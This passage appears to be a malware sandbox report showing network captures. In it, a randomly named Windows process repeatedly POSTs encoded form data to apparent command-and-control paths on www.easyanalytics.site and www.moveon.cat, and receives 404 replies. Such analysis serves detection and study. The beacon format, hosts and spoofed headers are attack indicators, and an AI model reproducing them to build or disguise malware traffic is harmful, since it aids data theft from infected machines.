              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.649774162.241.226.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:08:07.047419071 CEST809OUTPOST /d029/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.easyanalytics.site
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.easyanalytics.site
              Referer: http://www.easyanalytics.site/d029/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 52 75 4e 36 52 2f 35 38 77 69 71 2f 78 6a 44 2b 70 30 34 5a 50 5a 51 6f 58 35 33 6f 41 6e 2f 56 37 31 2f 30 52 72 30 58 63 4d 72 6c 48 63 6d 34 46 44 67 74 2f 73 4d 42 42 45 42 52 50 53 65 69 33 79 4a 6d 36 58 62 6a 37 68 62 39 2b 61 64 33 75 7a 59 5a 33 4a 77 2f 6f 38 4f 35 74 33 57 74 54 56 36 63 50 4b 52 4e 54 56 4a 30 57 54 42 76 33 45 36 49 2b 6e 35 69 69 52 6d 63 75 50 61 43 6e 62 63 4d 38 56 6a 33 57 30 6c 72 51 44 78 72 30 6d 53 2b 41 59 4c 7a 5a 43 6d 4e 39 4f 4d 57 65 66 58 75 75 2b 6c 34 4f 4c 4e 73 48 31 4a 6a 6e 37 53 30 6f 6d 41 4e 37 6b 45 5a 6d 37 58 6d 4e 5a 32 57 56 30 63 4c 37 59 38 53
              Data Ascii: FR=RuN6R/58wiq/xjD+p04ZPZQoX53oAn/V71/0Rr0XcMrlHcm4FDgt/sMBBEBRPSei3yJm6Xbj7hb9+ad3uzYZ3Jw/o8O5t3WtTV6cPKRNTVJ0WTBv3E6I+n5iiRmcuPaCnbcM8Vj3W0lrQDxr0mS+AYLzZCmN9OMWefXuu+l4OLNsH1Jjn7S0omAN7kEZm7XmNZ2WV0cL7Y8S
              Sep 6, 2024 09:08:07.624213934 CEST479INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:08:07 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.649775162.241.226.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:08:09.599709034 CEST833OUTPOST /d029/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.easyanalytics.site
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.easyanalytics.site
              Referer: http://www.easyanalytics.site/d029/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 52 75 4e 36 52 2f 35 38 77 69 71 2f 77 44 7a 2b 36 6a 73 5a 4b 35 51 72 59 5a 33 6f 4a 48 2f 52 37 30 44 30 52 71 42 51 63 65 2f 6c 45 34 71 34 58 53 67 74 79 4d 4d 42 4a 6b 42 51 4c 53 65 35 33 79 4e 41 36 57 58 6a 37 67 2f 39 2b 59 56 33 75 41 77 57 32 5a 77 78 39 73 4f 37 6a 58 57 74 54 56 36 63 50 4f 35 6e 54 54 68 30 57 6a 78 76 32 6c 36 4a 39 6e 35 6a 6c 52 6d 63 71 50 61 47 6e 62 63 36 38 55 50 64 57 77 56 72 51 47 4e 72 33 33 53 35 5a 49 4b 34 55 69 6d 59 39 75 64 50 52 5a 4f 76 71 34 6c 45 64 38 41 47 47 44 49 35 37 49 53 58 36 32 67 50 37 6d 63 72 6d 62 58 4d 50 5a 4f 57 48 6a 51 73 30 73 5a 78 61 76 6e 78 56 31 70 72 6f 67 63 70 72 72 64 42 35 47 33 65 52 77 3d 3d
              Data Ascii: FR=RuN6R/58wiq/wDz+6jsZK5QrYZ3oJH/R70D0RqBQce/lE4q4XSgtyMMBJkBQLSe53yNA6WXj7g/9+YV3uAwW2Zwx9sO7jXWtTV6cPO5nTTh0Wjxv2l6J9n5jlRmcqPaGnbc68UPdWwVrQGNr33S5ZIK4UimY9udPRZOvq4lEd8AGGDI57ISX62gP7mcrmbXMPZOWHjQs0sZxavnxV1progcprrdB5G3eRw==
              Sep 6, 2024 09:08:10.174850941 CEST479INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:08:10 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.649776162.241.226.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:08:12.153824091 CEST1846OUTPOST /d029/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.easyanalytics.site
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.easyanalytics.site
              Referer: http://www.easyanalytics.site/d029/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 52 75 4e 36 52 2f 35 38 77 69 71 2f 77 44 7a 2b 36 6a 73 5a 4b 35 51 72 59 5a 33 6f 4a 48 2f 52 37 30 44 30 52 71 42 51 63 65 6e 6c 48 4e 32 34 46 68 49 74 7a 4d 4d 42 48 45 42 56 4c 53 66 37 33 79 31 4d 36 57 4c 64 37 69 33 39 34 36 74 33 6f 78 77 57 38 5a 77 78 6c 63 4f 34 74 33 57 34 54 52 6d 59 50 4b 56 6e 54 54 68 30 57 68 70 76 67 45 36 4a 37 6e 35 69 69 52 6d 59 75 50 61 2b 6e 62 45 45 38 55 37 6e 57 6a 64 72 65 47 39 72 31 42 47 35 47 59 4b 36 58 69 6e 64 39 75 52 71 52 64 6d 4a 71 34 35 75 64 37 49 47 4c 48 45 6b 6f 64 79 37 6e 45 6b 65 71 6c 67 76 2f 74 48 56 4a 70 47 77 4c 68 41 36 7a 39 6c 39 59 72 72 65 66 46 67 2f 71 44 6f 54 73 76 67 75 39 31 79 31 52 6c 2f 34 78 57 38 4c 71 4d 57 5a 6f 6f 47 65 61 6c 31 67 4e 76 62 47 77 50 6a 52 66 59 2f 77 79 4a 72 45 49 48 4f 66 61 36 70 42 57 73 36 54 6a 56 38 4e 37 65 41 6d 45 5a 59 46 50 46 63 43 57 6f 6d 4f 55 52 38 59 56 37 78 55 54 30 52 37 64 4e 7a 4d 75 38 51 62 4a 56 6c 69 42 2f 63 72 50 52 37 51 57 75 6f 35 56 59 6e 64 4d 58 35 [TRUNCATED]
              Data Ascii: FR=RuN6R/58wiq/wDz+6jsZK5QrYZ3oJH/R70D0RqBQcenlHN24FhItzMMBHEBVLSf73y1M6WLd7i3946t3oxwW8ZwxlcO4t3W4TRmYPKVnTTh0WhpvgE6J7n5iiRmYuPa+nbEE8U7nWjdreG9r1BG5GYK6Xind9uRqRdmJq45ud7IGLHEkody7nEkeqlgv/tHVJpGwLhA6z9l9YrrefFg/qDoTsvgu91y1Rl/4xW8LqMWZooGeal1gNvbGwPjRfY/wyJrEIHOfa6pBWs6TjV8N7eAmEZYFPFcCWomOUR8YV7xUT0R7dNzMu8QbJVliB/crPR7QWuo5VYndMX50RxL7Wr8VWl4p9gn5pZJ0WNTDlvbye998CB9s9ebqWaZLjS9j9ck9B7BsjF0dYRE5XajcKJX3dvbC/wx3GzBdTnRVqnv+kQH9TPL9jRTfUkoZhXuoVWwptgxiSF8av8K/pBejaZ5atuh44UwEqZ3o+bI5N/JaLCaTQ6Eh2al5B3P4cSH5Lvoeti8wKkOSmnCRkwT0LY4NO33oaU8uWxSjYXAEgY+1gM5vNwF/BOhwWKm4b/L548N14UbvkQFSzg4Mn7SzmzttNhE1T0ePyS4avgC+Bop5Uco6UPqHBWdGrIBrBOspod0DT9iBmmuZu0kIlxzWSGp8MCXiI4HCYlzsqYutRhEUw1/X3E09BK+g4irX3Ole5ObacWkMRUO+Wcqzl/WbLLEjVq79a5HWGSJREBoaBzZIe8oqpRPaXSK9sQrz4GMy7QvVqI5w6zaz1zBj5cKGyq/BYsRbMeqlR7gLpMXItezn/0fBfXB5hndysiA1G7socpIoRzFHkI7yF4YU3sfqv5+Ul7bVpVvKl8NlohNp+fDJvhpNIF6dqHAHTjfiQeM18X6qT6mSY1mHbn0bO7mt5aDo0eKflo15fVUu/qm+5Sj/19+bVPybrzrZArHr5fqsdoGcrAunYgA3kiFA+NK+6wAU0o/ryQ/n0jK8vC7X1bU9BW7Qw [TRUNCATED]
              Sep 6, 2024 09:08:12.768970966 CEST479INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:08:12 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.649777162.241.226.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:08:14.695676088 CEST536OUTGET /d029/?FR=cslaSIgu4SK5hEDj9hUVBt4DVeSxODrxiV3UUYpYDpvuIfyXRHc3+9hbGUkpPVL7vSNSmH7KmnD+rq4wgj4O7IkekeXb2lWER124D4kOUSFtT1194nz+plZg+E7GwvWNw7cZgDY=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.easyanalytics.site
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:08:15.289027929 CEST479INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:08:15 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.649778217.160.0.193805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:08:20.369648933 CEST785OUTPOST /bb55/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.moveon.cat
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.moveon.cat
              Referer: http://www.moveon.cat/bb55/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 6e 66 62 30 47 4f 4f 55 4a 51 44 38 53 4b 32 58 74 46 4d 56 39 32 68 54 34 6c 54 77 4c 44 4f 34 78 70 57 74 54 61 37 4b 2b 57 4b 34 57 52 75 58 4d 4b 79 45 4e 51 72 6a 34 48 4c 75 6a 66 4f 71 6c 2b 54 4f 42 42 4f 2b 79 31 37 75 56 2b 42 64 4d 54 6d 77 54 72 65 37 53 36 4f 66 66 4b 61 6d 6d 45 35 6d 76 73 35 6b 37 6f 54 51 39 54 32 4c 6e 4a 51 46 7a 4d 6e 6a 4e 33 7a 46 75 45 79 35 66 77 76 64 2f 69 4e 75 2f 61 53 39 68 70 33 69 55 74 44 30 38 4c 4a 6e 4f 6b 34 71 73 58 30 71 37 51 44 34 6a 36 4d 31 77 33 38 48 6e 69 45 63 72 62 39 45 71 50 35 66 79 42 59 70 6c 61 6d 7a 31 66 55 30 36 38 7a 70 39 4d 4e 4c
              Data Ascii: FR=nfb0GOOUJQD8SK2XtFMV92hT4lTwLDO4xpWtTa7K+WK4WRuXMKyENQrj4HLujfOql+TOBBO+y17uV+BdMTmwTre7S6OffKammE5mvs5k7oTQ9T2LnJQFzMnjN3zFuEy5fwvd/iNu/aS9hp3iUtD08LJnOk4qsX0q7QD4j6M1w38HniEcrb9EqP5fyBYplamz1fU068zp9MNL
              Sep 6, 2024 09:08:21.131532907 CEST1236INHTTP/1.1 404 Not Found
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Date: Fri, 06 Sep 2024 07:08:20 GMT
              Server: Apache
              X-Powered-By: PHP/8.2.23
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"
              Content-Encoding: gzip
              Data Raw: 32 37 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 96 db 36 92 ef df f6 39 fb 0e 34 9d b5 a5 89 48 89 d4 57 4b dd 72 d6 e3 38 6b ef 49 62 6f ec cc 9e 89 95 db 87 92 20 35 6d 8a d4 90 54 7f a4 d3 0f 73 9f e5 be d8 fd 55 01 e0 87 44 a9 d5 dd 9e 73 76 3a 71 37 09 16 aa 0a 85 42 a1 00 14 80 93 27 df bf 7b f5 f1 ef ef 5f 1b 67 e9 32 78 f1 6f 8f 4f e8 af 11 78 e1 62 64 8a c4 34 66 5e ea 59 89 58 ae 02 7f 2a 46 66 cf 76 ed ae 09 b8 47 27 67 c2 9b d1 c3 a3 93 a5 48 3d 63 7a e6 c5 89 48 47 e6 af 1f 7f b0 8e 4c a3 59 f8 16 7a 4b e4 3d f7 c5 c5 2a 8a 53 d3 98 46 61 2a 42 c0 5e f8 b3 f4 6c 34 13 e7 40 6e f1 4b c3 f0 43 3f f5 bd c0 4a a6 5e 20 46 0e 13 7b 74 92 fa 69 20 5e bc ff 7f ff 77 e1 87 9e 11 46 86 08 09 4b ec cd 3c e3 d9 d3 23 d7 71 8e 8d 9f a2 73 61 bc 0b 4f 9a 12 f8 b1 64 8c 89 3f 8f a3 49 94 26 cf 33 d2 cf c3 c8 0f 67 e2 b2 01 5c f3 28 08 a2 8b e7 60 f9 f1 49 32 8d fd 55 6a a4 57 2b 70 9c 8a cb b4 f9 d9 3b f7 64 aa f9 e2 71 f3 2f c6 c9 93 4f af be 7f f9 f1 e5 27 e3 2f cd c7 17 40 12 5d d8 a7 17 [TRUNCATED]
              Data Ascii: 2756}694HWKr8kIbo 5mTsUDsv:q7B'{_g2xoOxbd4f^YX*FfvG'gH=czHGLYzK=*SFa*B^l4@nKC?J^ F{ti ^wFK<#qsaOd?I&3g\(`I2UjW+p;dq/O'/@]+>D"1F9kC,MWp7/Hiq3Nnq^ql`UKr>ddlZ"!Tkz)evh4n^,?Xe~hN;gl90[ApFB|2_^lD!u1u_ttWIE&CH%jX=s/XwZ8I(m[5$Qg7(dW5 =EQ_4aK^8KRQ1.av_wU<Jw65z#!y~tFj(UMWVh4?s)4!zv|5Vk=/S;&%wO2"*Z@x g( &~O{){v(<"yF
              Sep 6, 2024 09:08:21.131553888 CEST1236INData Raw: c8 17 90 6f a4 80 c4 46 0a 08 6d a4 80 dc 46 0a 88 96 53 40 ba 7e cc 55 a0 6c 82 ac 83 42 49 21 f1 d9 d4 ed 71 46 92 fe c4 99 68 6e 8b 9f 48 e2 f4 a9 7e a3 30 38 79 ad cf 75 ad 53 a3 88 47 e6 1a 06 79 ee 87 62 66 3e 19 91 01 8e e6 c6 ff 44 f1 17
              Data Ascii: oFmFS@~UlBI!qFhnH~08yuSGybf>DgM4ZgIJH0BVCF2@,Lz_Qk3q}zb5MjMp`E2=G~tvWdF!_{P}OQZr
              Sep 6, 2024 09:08:21.131584883 CEST1236INData Raw: 16 0a 52 c5 4a 51 1b 58 a2 5c fb 0b 76 61 0f 12 f1 30 8e a2 f4 da b2 20 46 6b 15 0b 8c 56 2d cb 4b 56 70 44 20 18 94 d8 b2 92 7f ac bd 58 a0 15 1c ef 83 ea 58 ed a1 d1 69 b6 f7 02 b5 ad ce d0 68 37 3b b7 00 b9 04 e4 ee 05 72 89 9c 7b 0b 39 a7 67
              Data Ascii: RJQX\va0 FkV-KVpD XXih7;r{9gw9k`91h:0BKO[S3BZ`po29nC8ST,X2\hsi+\QDBZ%vYh22h"?M'j8M)E?
              Sep 6, 2024 09:08:21.131596088 CEST1236INData Raw: 3c 84 c8 ed 56 e3 21 d8 0f b3 25 0f a1 20 ab 1a 16 a9 42 3a 95 56 e2 41 f5 5e 89 f1 76 ca d2 ee 3c a4 98 1b 84 0f b6 46 0f a2 79 0f 1b f5 10 7a b2 2a ef 62 b9 1e 42 ed ce f6 ec 21 c4 ee 68 e5 1e 4e ea 36 db c7 2b 41 da ee 15 5e f6 98 a3 83 bd 1f
              Data Ascii: <V!% B:VA^v<Fyz*bB!hN6+A^h "?aAeH`[p{{P{i68OUY,mUzB9;y]Y:d.<P^XxSrA|Tb
              Sep 6, 2024 09:08:21.131608009 CEST896INData Raw: d6 49 95 14 c5 72 c3 91 41 c7 8c 30 97 b8 16 a3 94 72 a6 0a 3b 11 db 21 6d d1 c6 b6 39 45 22 f3 4b ef 92 95 90 70 1f 46 0f e0 77 ee 5f ca d6 57 51 92 9c 60 29 17 b7 a1 0d c1 ee 6c 21 db 4a 25 a5 bf b3 52 1f 05 d8 64 0f 8f 4c c5 5e 15 da c8 01 82
              Data Ascii: IrA0r;!m9E"KpFw_WQ`)l!J%RdL^))N.>kcE`yPxS_%Cm)M3W"sOIe)HBSYf2i5[Ps1by*#rTik,,`xjq[K|\GRs:wUK`%= 9,F
              Sep 6, 2024 09:08:21.131619930 CEST1236INData Raw: 79 41 67 0c aa 4d 24 88 72 59 0d 31 7c 2b b8 dd 37 4f 2f d0 43 62 6a 15 4e c7 35 7d 26 47 b6 f0 5d 4d f0 b5 8e 6f 0a 6e 15 f9 58 fa 44 c2 13 de 94 c2 67 1b e0 10 43 8c 47 e2 4e ab 83 a3 e7 f2 e1 cf ec 0a 07 bd 60 33 dc 32 9a 09 1c 8f f0 39 c9 8e
              Data Ascii: yAgM$rY1|+7O/CbjN5}&G]MonXDgCGN`3298:P.n9ZiQgb//a9vconJNf$<>FS-yY|sA7K:fL;DR%Kid-pB#>7p,,m-<Z:2BS
              Sep 6, 2024 09:08:21.131699085 CEST1236INData Raw: ab f3 85 81 91 38 1d 4c 8f b1 aa 8e 9c 7c 3d c1 b9 c7 a7 e8 01 10 8f 18 26 59 64 e8 c5 c5 85 7d d1 a6 ab 03 9a 38 a8 bb d5 a4 f3 fb 25 c8 f0 92 a2 35 aa 00 1d 2c 6d 35 f9 2b 40 47 26 26 59 4c 03 fe 29 fd 45 65 cb 49 f8 91 d9 c5 d9 27 88 8a e4 c0
              Data Ascii: 8L|=&Yd}8%5,m5+@G&&YL)EeI'I;5<8):&[}af5UCttMh"b9@N<$ksJss'(Z`gQ`464:F{p{G}8DGK(8Ka(n;k(N$=yD8':VyE[
              Sep 6, 2024 09:08:21.131711006 CEST1236INData Raw: 21 86 e2 5c 22 fc 51 70 5b 9f b7 33 91 62 5d e9 6c ad db e1 8f 7e 8a e7 2c df 12 8e 24 18 97 59 7f 52 2f 85 af b2 ab fa 09 4d ea aa 98 9a 4a 0e 91 2e 0d 4b ae 80 08 26 bc 10 0b 89 ef e7 08 93 28 79 b5 c3 53 57 c2 7a 8f a7 ac 05 c0 35 95 92 7a 1f
              Data Ascii: !\"Qp[3b]l~,$YR/MJ.K&(ySWz5zp^%!!\Y^E<}:st5?,PMY}7Hg]Tz>LBO=Ak''s_8e}#/PFMB
              Sep 6, 2024 09:08:21.131721973 CEST906INData Raw: 95 95 9a 86 1f 9b 3c b3 80 c6 ce ab be aa c7 a1 4b 66 31 b5 86 e9 25 ec 21 b0 81 68 55 9d 57 4f 4c 50 f6 88 8d 48 c3 c0 74 18 3a 24 4c 76 53 a4 3e ad 0d 6b a3 b5 85 27 5f b5 18 9b 7e b8 a2 23 bc 31 25 30 83 3d 2c 50 03 af fc 0d 33 88 6c 6d c8 40
              Data Ascii: <Kf1%!hUWOLPHt:$LvS>k'_~#1%0=,P3lm@jDr5axs|5|TF)vmy]bgUeBfFk.B!/_lR(~1e-^ei^(}1*M6$T{W#~ppK)p,9:B. .


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.649779217.160.0.193805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:08:22.919388056 CEST809OUTPOST /bb55/ HTTP/1.1
